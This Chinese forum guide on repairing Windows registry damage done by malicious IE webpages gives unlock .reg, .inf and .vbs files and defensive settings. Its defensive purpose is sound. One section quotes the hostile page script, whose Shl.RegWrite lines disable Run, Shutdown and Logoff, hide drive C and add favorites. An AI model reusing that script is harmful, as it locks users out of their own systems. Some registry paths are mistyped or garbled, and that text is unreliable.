HKEY_LOCAL_MACHINE\System\Current Control Set\Services\VxD\MSTCP在右邊窗口加上字符串值「DefaultRcvWindow」並把它的值設定為「2144」,再增加另一字符串值「DefaultTTL」並把它的值設定為「60」至「64」(註:60是最小值,64是最大值,只要填上其中一個值就可),完成後關閉註冊表編輯器並重新啟動Win95即可。

TOP

被惡意網站擊中的解決辦法——註冊表使用全攻略之六

一、註冊表被修改的原因及解決辦法

  惡意網頁是含有有害代碼的ActiveX網頁文件,這些廣告信息的出現是因為瀏覽者的註冊表被惡意更改的結果。

  1、IE默認連接首頁被修改

  IE瀏覽器上方的標題欄被改成"歡迎訪問……網站"的樣式,受到更改的註冊表項目為:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
  通過修改"Start Page"的鍵值,達到修改IE默認連接首頁的目的
  在Windows啟動後,點擊"開始"→"運行"菜單,在"打開"欄中鍵入regedit,然後按"確定"鍵;
  展開註冊表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值"Start Page" ,將鍵值改為"about:blank"即可;
  同理,展開註冊表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 在右半部分窗口中找到串值"Start Page",然後按中所述方法處理。
  退出註冊表編輯器,重新啟動計算機,一切OK了!
  特殊例子:當IE的起始頁變成了某些網址後,就算你通過選項設置修改好了,重啟以後又會變成他們的網址啦,十分的難纏。其實他們是在你機器裡加了一個自運行程序,它會在系統啟動時將你的IE起始頁設成他們的網站。
  解決辦法:運行註冊表編輯器regedit.exe,然後依次展開
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run主鍵,然後將其下的registry.exe子鍵刪除,然後刪除自運行程序c:\Program Files\registry.exe,最後從IE選項中重新設置起始頁就好了。

  2、篡改IE的默認頁

  有些IE被改了起始頁後,即使設置了"使用默認頁"仍然無效,這是因為IE起始頁的默認頁也被篡改啦。就是以下註冊表項被修改:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL"Default_Page_URL"這個子鍵的鍵值即起始頁的默認頁。
  解決辦法:
  將"Default_Page_UR"鍵值中的那些篡改網站的網址改掉.

  3、修改IE瀏覽器缺省主頁,並鎖定設置項,禁止用戶更改回來。

  主要是修改了註冊表中IE設置的下面這些鍵值(DWORD值為1時為不可選):
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]"Settings"=dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]"Links"=dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]"SecAddSites"=dword:1
  解決辦法:  將上面這些DWORD值改為"0"即可恢復功能。

  4、IE的默認首頁灰色按扭不可選

 由於HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel 下的DWORD值"homepage"的鍵值被修改的緣故。原來的鍵值為"0",被修改為"1"(即為灰色不可選狀態)。
  解決辦法:將"homepage"的鍵值改為"0"即可。

  5、IE標題欄被修改

  在系統默認狀態下,是由應用程序本身來提供標題欄的信息,但也允許用戶自行在上述註冊表項目中填加信息,而一些惡意的網站正是利用了這一點來得逞的:它們將串值Window Title下的鍵值改為其網站名或更多的廣告信息,從而達到改變瀏覽者IE標題欄的目的。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
  解決辦法:
  在Windows啟動後,點擊"開始"→"運行"菜單項,在"打開"欄中鍵入regedit,然後按"確定"鍵;
  展開註冊表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值"Window Title" ,將該串值刪除即可,或將Window Title的鍵值改為"IE瀏覽器"等你喜歡的名字;
  同理,展開註冊表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,按中所述方法處理。
  退出註冊表編輯器,重新啟動計算機,運行IE,即可

  6、IE右鍵菜單被修改

  受到修改的註冊表項目為:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt下被新建了網頁的廣告信息,並由此在IE右鍵菜單中出現!
  解決辦法:打開註冊標編輯器,找到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,刪除相關的廣告條文,注意不要把下載軟件FlashGet和Netants也刪除掉,這兩個是正常的。

  7、IE默認搜索引擎被修改

  在IE瀏覽器的工具欄中有一個搜索引擎的工具按鈕,可以實現網絡搜索,被篡改後只要點擊那個搜索工具按鈕就會鏈接到那個篡改網站。出現這種現象的原因是以下註冊表被修改:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant
  解決辦法:
  運行註冊表編輯器,展開上述子鍵,將"CustomizeSearch"和"SearchAssistant"的鍵值改為某個搜索引擎的網址即可。

  8、系統啟動時彈出對話框

  受到更改的註冊表項目為:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon在其下被建立了字符串"LegalNoticeCaption"和"LegalNoticeText",其中"LegalNoticeCaption"是提示框的標題,"LegalNoticeText"是提示框的文本內容。它們的存在,得我們每次登陸到Windwos桌面前都出現一個提示窗口,顯示那些網頁的廣告信息。
  解決辦法:打開註冊表編輯器,找到
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon主鍵,在右邊窗口中找到"LegalNoticeCaption"和"LegalNoticeText"這兩個字符串,刪除就可。

  9、瀏覽網頁註冊表被禁用

  這是由於註冊表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值"DisableRegistryTools"被修改為"1"的緣故,將其鍵值恢復為"0"即可。
  解決辦法:用記事本程序建立以REG為後綴名的文件,將下面這些內容複製在其中就可以了:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]"DisableRegistryTools"=dword:00000000

 10、瀏覽網頁開始菜單被修改

  1)禁止"關閉系統"   2)禁止"運行"
  3)禁止"註銷"   4)隱藏C盤--你的C盤找不到了!
  5)禁止使用註冊表編輯器regedit   6)禁止使用DOS程序
  7)使系統無法進入"實模式"   8)禁止運行任何程序
     
註:以下是該網頁修改受害者的註冊表項所用的招數
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
註:使受害者系統沒有「運行」項,這樣用戶就不能通過註冊表編輯器來修改該有害網頁對系統註冊表的修改。
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoClose", 01, "REG_BINARY");
註:使受害者系統沒有「關閉系統」項
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");
註:使受害者系統沒有「註銷」項
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
註:使受害者系統沒有邏輯驅動器C
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\WinOldApp\\ Disabled","REG_BINARY");
註:禁止運行所有的DOS應用程序;
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\ \WinOldApp\\NoRealMode","REG_BINARY");
註:使系統不能啟動到「實模式」(傳統的DOS模式)下;
又註:進入該網頁,它還會修改以下的註冊表項,使WINDOWS系統登錄時顯示一個登錄窗口(在MicroSoft網絡

用戶登錄之前)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeCaption", "嗚啦啦...");
註:這些代碼會使窗口的標題是「嗚啦啦…」
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeText", "《嗚啦啦...》
註:上面一行是會在窗口中顯示出來的文字
註:下面兩行代碼修改註冊表,使受害者所有的IE窗口都加上以下的標題:「嗚啦啦…」
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "嗚啦啦...");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "嗚啦啦...");
註:到上面一行為止,完成了對受害者的註冊表的所有修改!
註:下面代碼用來將其網頁增加到受害者的收藏夾中
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}

註:下面就是使其網頁加入到你的收藏夾的具體代碼
AddFavLnk(loc, "找到訪客無法瀏覽此圖片或連結,請先 註冊登入會員 ", "http://www.findfeel.com";)
  
受害用戶的修復方法:
  1:對於Win9x用戶,建議在電腦啟動時按F8鍵,選擇到MS-DOS方式下,使用Scanreg/restore命令來恢復以前備份的、正常的註冊表。
  2:對於Win2000用戶,把以下內容copy下來,存為unlock.reg文件,選帶命令行的安全模式,用命令regedit unlock.reg導入,如何重啟機器就OK了。
unlock.reg文件內容如下:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\WinOldApp]
"Disabled"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\WinOldApp]
"NoRealMode"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersionWinlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE瀏覽器"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE瀏覽器"

     11、IE中鼠標右鍵失效
  瀏覽網頁後在IE中鼠標右鍵失效,點擊右鍵沒有任何反應!

  12、查看""源文件"菜單被禁用
  在IE窗口中點擊"查看"→"源文件","源文件"菜單已經被禁用。具體的位置為:在註冊表
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer下建子鍵"Restrictions",然後在"Restrictions"下面建立兩個DWORD值:"NoViewSource"和"NoBrowserContextMenu",並為這兩個DWORD值賦值為"1"。
  在註冊表
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions下,將兩個DWORD值:
"NoViewSource"和"NoBrowserContextMenu"的鍵值都改為了"1"。
  解決辦法:
  將以下內容另存為後綴名為reg的註冊表文件,如unlock.reg,雙擊unlock.reg導入註冊表,重新運行IE就會恢復正常。
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000000
"NoBrowserContextMenu"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000000
"NoBrowserContextMenu"=dword:00000000
  要特別注意的是,在你編製的註冊表文件unlock.reg中,"REGEDIT4"一定要大寫,並且它的後面一定要空一行,還有,"REGEDIT4"中的"4"和"T"之間一定不能有空格,否則將前功盡棄!注意如果是Win2000或WinXP用戶,請將"REGEDIT4"改為Windows Registry Editor Version 5.00。


do
{
goodgoodstudy();
daydayup();
}
while (!died)

二、預防辦法

  1、要避免中招,關鍵是不要輕易去一些自己並不瞭解的站點,特別是那些看上去美麗誘人的網址更不要貿然前往.

  2、由於該類網頁是含有有害代碼的ActiveX網頁文件,因此在IE設置中將ActiveX插件和控件、Java腳本等全部禁止就可以避免中招。
  具體方法是:在IE窗口中點擊"工具→Internet選項,在彈出的對話框中選擇"安全"標籤,再點擊"自定義級別"按鈕,就會彈出"安全設置"對話框,把其中所有ActiveX插件和控件以及Java相關全部選擇"禁用"即可。不過,這樣做在以後的網頁瀏覽過程中可能會造成一些正常使用ActiveX的網站無法瀏覽。

  3、對於Windows98用戶,打開C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的"ActiveXComponent.class"刪掉;對於WindowsMe用戶,打開C:\WINDOWS\JAVAPackages\5NZVFPF1.ZIP,把其中的"ActiveXComponent.class"刪掉。請放心,刪除這個組件不會影響到你正常瀏覽網頁的。

  4、對於所有用戶,都建議安裝Norton AntiVirus 2002 v8.0殺毒軟件,此軟件已經把通過IE修改註冊表的代碼定義為Trojan.Offensive ,增加了Script Blocking功能,將對此類惡作劇進行監控,並予以攔截。

  5、既然這類網頁是通過修改註冊表來破壞我們的系統,那麼我們可以事先把註冊表加鎖:禁止修改註冊表,可以達到預防的目的。
  加鎖方法如下:
  (1)運行註冊表編輯器regedit.exe;
  (2)展開註冊表到   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下,新建一個名為DisableRegistryTools的DWORD值,並將其值改為"1",即可禁止使用註冊表編輯器regedit.exe。
  解鎖方法如下:
  用記事本編輯一個任意名字的.reg文件,如unlock.reg,內容如下:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
  存盤,你就有了一把解鎖的鑰匙了!如果要使用註冊表編輯器,則雙擊unlock.reg即可。注意如果你是Win2000或WinXP用戶,請將"REGEDIT4"寫為Windows Registry Editor Version 5.00。

  6、對Win2000用戶,還可以通過在Win2000下把服務裡面的遠程註冊表操作服務"Remote Registry Service"禁用,來對付該類網頁。具體方法是:點擊"管理工具→服務→Remote Registry Service(允許遠程註冊表操作)",將這一項禁用即可。

  7、雖然經過一番辛苦的勞動修改回了標題和默認連接首頁,但如果以後又不小心進入該站就又得麻煩一次。可以在IE中做設置以便永遠不進該站點:
  打開IE,點擊"工具"→"Internet選項"→"內容"→"分級審查",點"啟用"按鈕,會調出"分級審查"對話框,然後點擊"許可站點"標籤,輸入網站網址。
  
  8、修改註冊表後留後門,目的讓你修改註冊表好像成功,重新啟動後又恢復到被修改的狀態。
這主要是在啟動項裡留了後門,可以打開註冊表到
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
HKCU\Software\Microsoft\Windows\CurrentVersionRun-
看看有沒有可疑的啟動項目,這一點最多朋友忽略,哪些啟動可疑呢?
我這裡給出幾個需要注意的,啟動項裡鍵值有出現.hml和.htm後綴的,最好都去掉,還有有.vbs後綴的啟動項也去掉,還有一個很重要的,如果有這一個啟動項,出現有類似鍵值的,比如:
system 鍵值是regedit -s c:\windows……請注意,這個regedit -s 是註冊表的一個後門參數,是用來導 入註冊表的,這樣的選項一定要去掉
還有一類修改會在c:\windows\產生.vbs後綴的文件,或是.dll文件,其實.dll文件實際是.reg文件,此時你要看看c:\windows\win.ini文件,看看load=,run=,這兩個選項後面應該是空的,如果有其他程序 修改load=,run=,將=後面程序刪除,刪除前看看路徑和文件名,刪除後在到system下刪除對應的文件
還有一種方法,如果屢次修改重啟又恢復回去,可以搜索C盤下所有的.vbs文件,可能有隱藏的,用記事本打開,看到裡面有關於修改註冊表的都把它刪除或保險起見把後綴改掉,你可以按中惡意網頁的病毒的時間來搜索文件,
下面的這個漏洞非常值得注意,在啟動IE時還有一個陷阱,就是IE主界面的工具的菜單裡的廣告,一定要去掉,因為這些會在你啟動IE時啟動,所以你修改完其他的先別著打開IE窗口,否則白費力氣,方法:打開 註冊表HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions看到廣告就刪,別留情 一個很重要的問題,在中了惡意網頁的陷阱後一定要先清空IE所有臨時文件,切記!


剖析各類惡意網頁對策分析—註冊表使用全攻略之七
互聯網利用IE等的漏洞完全可以讓你通過瀏覽網頁讓你的電腦面目全非,或者格盤,甚至中下木馬,傳播病毒,而且這種形式的傳播愈演愈烈,閒話少說了,現在來分析一下各類惡意網頁。
分析前先介紹一下註冊表的修改方法,因為註冊表在網頁病毒中是中樞,就是通過它讓你的電腦面目全非。
第一種方法:直接修改法
就是在運行裡敲入regedit,然後進行編輯,這是通常修改註冊表的方法。
第二址椒簉eg包導入法
現在以解鎖註冊表為例(其實解鎖用兔子等工具更好更方便,這裡只是說明如何建立reg包)
對於WIN 9x/ME/NT 4.0來說,在記事本把下面的內容另存為*.reg文件,導入即可

REGEDIT4
;這裡一定要空一行,否則將修改失敗
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

對於WIN 2000或XP,把 REGEDIT4 改為Windows Registry Editor Version 5.00即可

第三種方法:inf安裝法
對於98/ME,把下面的內容保存為.inf後綴文件,右鍵單擊給文件選擇安裝即可
[version]
signature="$CHICAGO$"
[DEFAULTINSTALL]
ADDREG=unlock.ADD.REG
DELREG=unlock.DEL.REG
[unlock.ADD.REG]
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\system
[unlock.DEL.REG]
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\system

若為2000或XP,將CHICAGO修改為Windows NT 至於其他修改格式,這裡不多說,可以自己找找資料

第四種方法:vbs腳本法
把下面的內容保存為.vbs後綴文件
Dim unlock
Set unlock = WScript.CreateObject("WScript.Shell")
unlock.Popup "將為您解開註冊表"
unlock.RegWrite

"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"

第五種方法:呵呵,是以其人之道還治其人之身的方法,這裡不介紹
至於在DOS下編輯註冊表,這裡不再舉例說明

請切記,修改註冊表前一定要備份註冊表!!切記!!

知道了方法,現在就來分析各類惡意網站和對付的方針
惡意網站大致可以分成以下幾類:
一 利用IE的文本漏洞通過編輯的腳本程序修改註冊表的行為
1。輕度修改註冊表:比如標題攔,默認主頁,搜索頁,添加廣告等,先來看看其中的一段原代碼
//a.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");惡意網頁就是通過這個ID修改註冊表的。
//Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\Explorer\\NoRun",

01, "REG_BINARY"); 這一句代碼可以讓你的運行菜單消失。
清除方法:
本文對一般的被修改瀏覽器的解決方案不作提供,因為現在網上關於如何通過修復註冊表來恢復的文章很多 ,可以自己找來看看
我認為這一類的修改一般可以通過註冊表修復工具來修復,不必手動去修改。
常用工具有:超級兔子魔法,優化大師,3721魔寶石,殺毒王自帶的IE修復器等
瑞星的註冊表修復工具:
訪客無法瀏覽此圖片或連結,請先 註冊登入會員 ;ful.htm
毒霸的註冊表修復工具:http://sh.duba.net/download/other/tool_011027_RegSolve.htm ;
推薦一個很好的在線修復網訪客無法瀏覽此圖片或連結,請先 註冊登入會員
補丁:WINDOWS 2000:http://www.microsoft.com/china/windows2000/SP2.htm ;
WINDOWS 9X用戶 :http://www.microsoft.com/downloads/release.asp?ReleaseID=32558 ;

2。修改註冊表禁止命令形式的修改,目的是不讓用戶通過註冊表修復回去。
最通常的修改是鎖住註冊表,還有破壞關聯:比如.reg,.vbs,.inf等
關於解鎖註冊表,在前面已經介紹了方法,至於被修改關聯,只要我前面說的註冊表修改的方法裡的關聯還 能用,就可以用其中的任意一個,但如果.reg,.vbs,.inf痘修改了,怎麼辦?,也不用怕,把 .exe 後綴改為.com後綴,我一樣可以編輯註冊表,.com也被改了,怎麼辦?沒那麼狠吧,行,我再改後綴為.scr 。嘿嘿,一樣還可以修改。
最好的最簡單的辦法,馬上重新啟動,按F8進入DOS下,敲入SCANREG/RESTORE,選擇以前的正常時的註冊表 還原就可以,注意了,一定要選擇沒被修改時的註冊表!如果發現連scanreg痘刪除了(一些網站就是這麼 狠的,用A盤COPY一個scanreg.exe到COMMAN下即可
有必要在這裡說說常見的文件關聯的默認值
正常的exe關聯為[HKEY_CLASSES_ROOT\exefile\shell\open\command]
默認的鍵值為:"%1 %*" 將此關聯改回去即可使用exe文件

3。修改註冊表後留後門,目的讓你修改註冊表好像成功,重新啟動後又恢復到被修改的狀態。
這主要是在啟動項裡留了後門,可以打開註冊表到(也可以用一些工具比如優化大師等來察看)
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
HKCU\Software\Microsoft\Windows\CurrentVersionRun-
看看有沒有可疑的啟動項目,這一點最多朋友忽略,哪些啟動可疑呢?
我這裡給出幾個需要注意的,啟動項裡鍵值有出現.hml和.htm後綴的,最好都去掉,還有有.vbs後綴的 啟動項也去掉,還有一個很重要的,如果有這一個啟動項,出現有類似鍵值的,比如:
system 鍵值是regedit -s c:\windows……請注意,這個regedit -s 是註冊表的一個後門參數,是用來導 入註冊表的,這樣的選項一定要去掉
還有一類修改會在c:\windows\產生.vbs後綴的文件,或是.dll文件,其實.dll文件實際是.reg文件
此時你要看看c:\windows\win.ini文件,看看load=,run=,這兩個選項後面應該是空的,如果有其他程序 修改load=,run=,將=後面程序刪除,刪除前看看路徑和文件名,刪除後在到system下刪除對應的文件
還有一種方法,如果屢次修改重啟又恢復回去,可以搜索C盤下所有的.vbs文件,可能有隱藏的,用記事本打開,看到裡面有關於修改註冊表的都把它刪除或保險起見把後綴改掉,你可以按中惡意網頁的病毒的時間來搜索文件
下面的這個漏洞非常值得注意,很多朋友說,你說的方法我都試了,啟動項裡絕對沒有什麼可疑的,也沒有什麼vbs文件,呵呵,在啟動IE時還有一個陷阱,就是IE主界面的工具的菜單裡的廣告,一定要去掉,因為這些會在你啟動IE時啟動,所以你修改完其他的先別著打開IE窗口,否則白費力氣,方法:打開 註冊表
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions看到廣告就刪,別留情一個很重要的問題,在中了惡意網頁的陷阱後一定要先清空IE所有臨時文件,切記!

說了那麼多廢話,那如何防禦這類惡意網頁呢?
一個一勞永逸的方法,把F935DC22-1CF0-11D0-ADB9-00C04FD58A0B這個ID刪掉
在註冊表的路徑為HKEY_CLASSES_ROOT\CLSID\{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}
記住,看清楚了再刪除,千萬別刪錯其他。刪掉這個F935DC22-1CF0-11D0-ADB9-00C04FD58A0B對系統不會有影響的。
在IE的選單欄中選擇「工具→「Internet選項」,在彈出的對話框中切換到「安全」標籤,選擇「 Internet」後點擊「自定義級別」按鈕,在「安全設置」對話框中,把「ActiveX控件和插件、「腳本」 中的相關選項全部選擇「禁用」或「提示」即可。但如果選擇了「禁用」,一些正常使用ActiveX和腳本的 網站可能無法完全顯示。建議選擇:提示。遇到警告時,看看該網站的原代碼,如果發現有出現 Shl.RegWrite等的代碼,就不要去了,如果是加密的原代碼,不是自己熟悉的網站也不要去,如果連右鍵都用不了的,也要小心為好(看看原碼有什麼所謂,除非有什麼好的JAVA或是惡意代碼)
對於Windows98用戶,請打開C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的「ActiveXComponent.class刪掉,對於WindowsMe用戶,請打開C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的「ActiveXComponent.class」刪掉,這些刪掉不會影響正常瀏覽網頁
在Windows 2000/XP,可以通過禁用「遠程註冊表服務」來阻擋部分惡意腳本。具體方法是:在「控制面板→「管理工具→「服務」中右鍵單擊「Remote Registry Service」,在彈出選單中選擇「屬性」,打開屬性對話框,在「General」內將「Startup ype」設為「Disabled。這樣也可以攔截部分惡意腳本程序。
嘿嘿,不用IE。用其他瀏覽器也可以……
在中了惡意網頁的陷阱後,先不要立即重新啟動計算機,到啟動項裡看看,有沒有什麼危險的啟動項,不如deltree之類的

二 利用IE漏洞直接破壞Windows系統
如今利用瀏覽網頁格式化硬盤已經不是什麼新鮮事了,當某一天,你上網時突然跳出警告說當前頁面包含 不安全的頁面,如果你選擇「是」,很可能硬盤被格式化掉
看看它的部分原代碼:
//<xxx ……id=wsh……F935DC22-1CF0-11D0-ADB9-00C04FD58A0B……>wsh(……)</xxx>
防禦這一類網頁,可以用下面的方法:
刪掉F935DC22-1CF0-11D0-ADB9-00C04FD58A0B這個ID,因為這個ID可以用來生成命令格式,可以執行硬盤 的可執行文件,具體路徑
HKEY_CLASSES_ROOT\CLSID\{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B} 再次提醒,別刪錯了。
建議都把deltree.com和format.com命令改掉,比如用優化大師後改為deltree.wom和format.wom
把C盤WINDOWS下的Wscript.exe改名也是一個辦法。
也可以卸載WSH:
98/ME:進入「控制面板」,選擇「添加/刪除程序」,選「Windows安裝程序」,選擇「附件」,再選 擇「詳細資料」中的Windows Scripting Host,確定卸載。
在Windows 2000中禁用WSH的方法是,雙擊"電腦"完,然後執行"工具/文件夾選項"命令,選擇" 文件類型"選項卡,找到"VBS VBScript Script File"選項,並單擊〔刪除〕按鈕,最後單擊〔確定〕即可或者升級WSH到WSH 5。6
IE瀏覽器可以被惡意腳本修改,原因就是IE 5.5以及以前版本中的WSH允許攻擊者利用javascript中的 Getxxx函數以及htmlfilr Activex對像讀取瀏覽者的註冊表。微軟最新的Microsoft Windows Script 5.6已經修正了這個問 題。
WSH 5.6 For Win9x/NT官方下www.microsoft.com
WSH 5.6 For Win2000官方下載:http://www.microsoft.com/devonly/ ;

三 安全性漏洞問題

現在通過註冊表可以在硬盤生成文件,可以讀取註冊表
利用IE漏洞可以傳播病毒,目前的瀏覽網頁可以感染新歡樂時光等腳本病毒,很多是通過IE漏洞入侵的, 還有目前的網頁木馬的問題,其實也是利用了IE的MIME頭錯誤漏洞,讓用戶自動運行木馬程序,這一類程序製作容易,很容易傳播,這一類的MIME頭錯誤對策:打補丁或升級
訪客無法瀏覽此圖片或連結,請先 註冊登入會員 ;
1。看看IE 5.0的一個漏洞:可以寫一段錯誤的HTML代碼使你的IE當掉,代碼這裡就不便貼出來了。
再來看看這個ID:0D43FE01-F093-11CF-8940-00A0C9054228就是用來生成文件的
2。IE現在還有IFRME漏洞,通過這個漏洞可以讓IE瀏覽頁面後自動執行.exe文件
防禦對策:最好升級IE到SP2上」,或者安裝PATCH Q290108(謝謝飄飄指出這裡的錯誤),如果你真的不想用高版本IE,怕佔用資源大,就一定要記住把補丁打上。因為目前很多病毒都是利用IE和OE的這個漏洞進行傳播,愛情森林病毒是其中一個。
還有刪除HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} 這個ID
3。在IE6(build 2600)版本中,可以用一段javascript腳本代碼讓IE拒絕服務,98中能造成IE的不響應,當試圖終止任務的時候,將造成操作系統的崩潰,2000中能造成50%的CPU被長時間利用,之後瀏覽器會詢問是否讓用。
防禦對策:把JAVA和腳本禁止掉,建議是升級IE或打補丁(看來不打補丁就是不行)
4。IE中的框架(Frame)漏洞,IE 5.01,5.5.6.0都受到影響,利用這個漏洞可以洩露用戶的信息。
對策:打補丁:http://www.microsoft.com/Windowsupdate
訪客無法瀏覽此圖片或連結,請先 註冊登入會員

獲取控制權限此類黑手會利用IE執行Actives時候發生,雖然說IE提供對於"下載已簽名的ActiveX控件"進行提示的功能,但是惡意攻擊代碼會繞過IE,在無需提示的情況下下載和執行ActiveX控件程序,而這時惡意攻擊者就會取得對系統的控制權限。如果要屏蔽此類黑手,可以打開註冊表編輯器,然後展開如下分支:
解決方法是在註冊表分支HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\ 下為Active Setup controls創建一個基於CLSID的新鍵值{6E449683_C509_11CF_AAFA_00AA00 B6015C},然後在新鍵值下創建一個REG_DWORD 類型的鍵Compatibility,並設定鍵值為0x00000400即可。

四 無聊惡意網頁
這一類網頁是利用編寫javascript代碼,比如彈出無數關不完的窗口,只能讓CPU資源耗盡重新啟動,說句實話,現在國內的殺毒軟件的網頁監控對這類惡意網頁根本沒法攔截(國外的我沒試過)
這一類網頁編寫並不難,都是通過寫一些死循環來達到目的。
防禦方法:將JAVA禁用。升級IE到高版本
還有是利用WIN98的漏洞讓你掉線或者是死機的,防禦對策,給98拚命打補丁(不要用98了,2000穩定) 上網時切記把網頁監控或註冊表監控打開,現在國內殺毒軟件對寫入註冊表的行為的攔截的成功率都不錯 通過上面的分析可以看出一個很重要的問題:一定要時常給自己的系統打補丁,微軟一般出了補丁,很快就有新的病毒代碼來攻擊的,所以切記時常打補丁!

do
{
goodgoodstudy();
daydayup();
}
while (!died)

TOP

WinXP註冊表應用—註冊表使用全攻略之八
Win XP註冊表還原簡單一法

Win XP提供了一個還原註冊表的新方法,步驟如下:
  l.重新啟動計算機,在看到「選擇啟動操作系統」消息後,請按「F8」鍵。
2.使用箭頭鍵突出顯示「最後一次正確的配置」,然後按Enter鍵。必須關閉NUM LOCK,數字鍵盤上的箭頭鍵才能工作。
3.如果有雙啟動或多啟動系統,請使用箭頭鍵突出顯示要啟動的操作系統,然後按「Enter」鍵。

